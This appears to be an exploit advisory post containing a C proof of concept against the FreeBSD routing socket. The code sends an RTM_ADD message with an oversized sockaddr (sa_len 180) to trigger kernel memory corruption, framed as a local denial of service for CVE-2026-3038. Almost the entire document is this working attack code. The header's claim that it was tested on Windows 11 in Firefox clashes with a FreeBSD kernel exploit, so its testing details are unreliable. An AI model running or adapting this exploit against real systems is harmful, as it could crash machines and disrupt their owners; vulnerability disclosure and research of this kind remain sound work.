=============================================================================================================================================
| # Title     : FreeBSD Routing Socket Input Validation Analysis – Oversized sockaddr in RTM_ADD                                            |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://www.freebsd.org/                                                                                                    |
=============================================================================================================================================

[+] Summary    :  PoC attempts to test the robustness of the FreeBSD routing socket subsystem by crafting a RTM_ADD message containing an 
                  intentionally oversized sockaddr structure (sa_len greater than the traditional sockaddr_storage limit of 128 bytes).
				  
                  4 you https://packetstorm.news/files/id/216124/

[+] POC   :  

#include <sys/types.h>
#include <sys/socket.h>
#include <net/route.h>
#include <net/if.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

#define ROUNDUP(a) \
    ((a) > 0 ? (1 + (((a) - 1) | (sizeof(long) - 1))) : sizeof(long))

struct malicious_sockaddr {
    unsigned char  sa_len;    
    unsigned char  sa_family; 
    char           sa_data[254]; 
};

int main() {
    int s;
    char buf[1500];
    struct rt_msghdr *rtm;
    struct malicious_sockaddr *dst, *gw;
    int l;

    printf("[+] FreeBSD CVE-2026-3038 Local DoS PoC\n");

    s = socket(PF_ROUTE, SOCK_RAW, AF_UNSPEC);
    if (s < 0) {
        perror("[-] socket(PF_ROUTE) failed");
        return 1;
    }

    memset(buf, 0, sizeof(buf));
    rtm = (struct rt_msghdr *)buf;
    rtm->rtm_msglen = 0; 
    rtm->rtm_version = RTM_VERSION;
    rtm->rtm_type = RTM_ADD; 
    rtm->rtm_addrs = RTA_DST | RTA_GATEWAY;
    rtm->rtm_flags = RTF_UP | RTF_GATEWAY | RTF_STATIC;
    rtm->rtm_pid = getpid();
    rtm->rtm_seq = 42;

    dst = (struct malicious_sockaddr *)(rtm + 1);
    dst->sa_family = AF_INET;
    dst->sa_len = 180; 
    memset(dst->sa_data, 'A', 170);

    int dst_space = ROUNDUP(dst->sa_len);
    gw = (struct malicious_sockaddr *)((char *)dst + dst_space);
    gw->sa_family = AF_INET;
    gw->sa_len = sizeof(struct sockaddr_in);
    ((struct sockaddr_in *)gw)->sin_addr.s_addr = inet_addr("127.0.0.1");

    rtm->rtm_msglen = sizeof(struct rt_msghdr) + dst_space + ROUNDUP(gw->sa_len);

    printf("[*] Sending packet: msglen=%d, dst->sa_len=%d\n", rtm->rtm_msglen, dst->sa_len);
    printf("[!] Attempting to trigger kernel memory corruption...\n");

    if (write(s, buf, rtm->rtm_msglen) < 0) {

        fprintf(stderr, "[-] Result: %s\n", strerror(errno));
    } else {
        printf("[+] Packet accepted. If the system is vulnerable, it might crash now.\n");
    }

    close(s);
    return 0;
}

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================